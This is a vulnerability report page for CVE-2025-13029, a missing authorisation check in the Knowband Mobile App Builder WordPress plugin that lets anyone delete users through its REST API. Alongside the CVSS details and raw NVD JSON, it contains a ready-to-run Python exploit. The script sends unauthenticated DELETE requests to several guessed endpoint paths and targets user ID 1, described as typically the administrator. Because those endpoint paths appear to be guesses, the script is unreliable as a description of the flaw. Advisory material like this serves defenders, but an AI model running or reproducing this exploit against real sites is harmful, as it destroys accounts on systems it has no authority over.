Security Vulnerability Report
CVE-2025-13029 CVSS 7.5 HIGH

CVE-2025-13029

Published: 2025-12-31 06:15:40
Last Modified: 2026-04-15 00:35:42

Description

The Knowband Mobile App Builder WordPress plugin before 3.0.0 performs no authorisation check when deleting users via its REST API, allowing unauthenticated attackers to delete arbitrary users.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Knowband Mobile App Builder WordPress plugin < 3.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-13029 PoC - Knowband Mobile App Builder Unauthenticated User Deletion
# Target: WordPress site with Knowband Mobile App Builder plugin < 3.0.0


def delete_wordpress_user(target_url, user_id):
    """
    Exploit for CVE-2025-13029
    Deletes arbitrary WordPress users without authentication

    Args:
        target_url: Base URL of the WordPress site
        user_id: ID of the user to delete

    Returns:
        Response from the server
    """
    # Common REST API endpoint paths for the plugin
    endpoints = [
        '/wp-json/mobile-app-builder/v1/delete_user',
        '/wp-json/kb-mobile-app/v1/delete_user',
        '/?rest_route=/mobile-app-builder/v1/delete_user'
    ]

    payload = {
        'user_id': user_id
    }

    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        print(f"[*] Trying endpoint: {url}")

        try:
            # Send DELETE request without authentication
            response = requests.delete(url, json=payload, timeout=10)

            if response.status_code == 200:
                print(f"[+] Success! User {user_id} deleted via {url}")
                return response.json()
            elif response.status_code == 401:
                print("[-] Endpoint requires authentication")
            else:
                print(f"[-] Unexpected response: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")

    return None


# Example usage
if __name__ == '__main__':
    # Replace with target URL
    target = 'https://example.com'
    # User ID to delete (typically 1 for admin)
    user_id = 1

    result = delete_wordpress_user(target, user_id)
    if result:
        print(f"Response: {json.dumps(result, indent=2)}")
```

References

https://wpscan.com/vulnerability/22344534-cd36-4817-b683-c0af55759e01/ (WPScan advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13029",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-31T06:15:40.270",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Knowband Mobile App Builder WordPress plugin before 3.0.0 does not have authorisation when deleting users via its REST API, allowing unauthenticated attackers to delete arbitrary users."
      },
      {
        "lang": "es",
        "value": "El plugin de WordPress Knowband Mobile App Builder anterior a la versión 3.0.0 no tiene autorización al eliminar usuarios a través de su API REST, lo que permite a atacantes no autenticados eliminar usuarios arbitrarios."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/22344534-cd36-4817-b683-c0af55759e01/",
        "source": "[email protected]"
      },
      {
        "url": "https://wpscan.com/vulnerability/22344534-cd36-4817-b683-c0af55759e01/",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```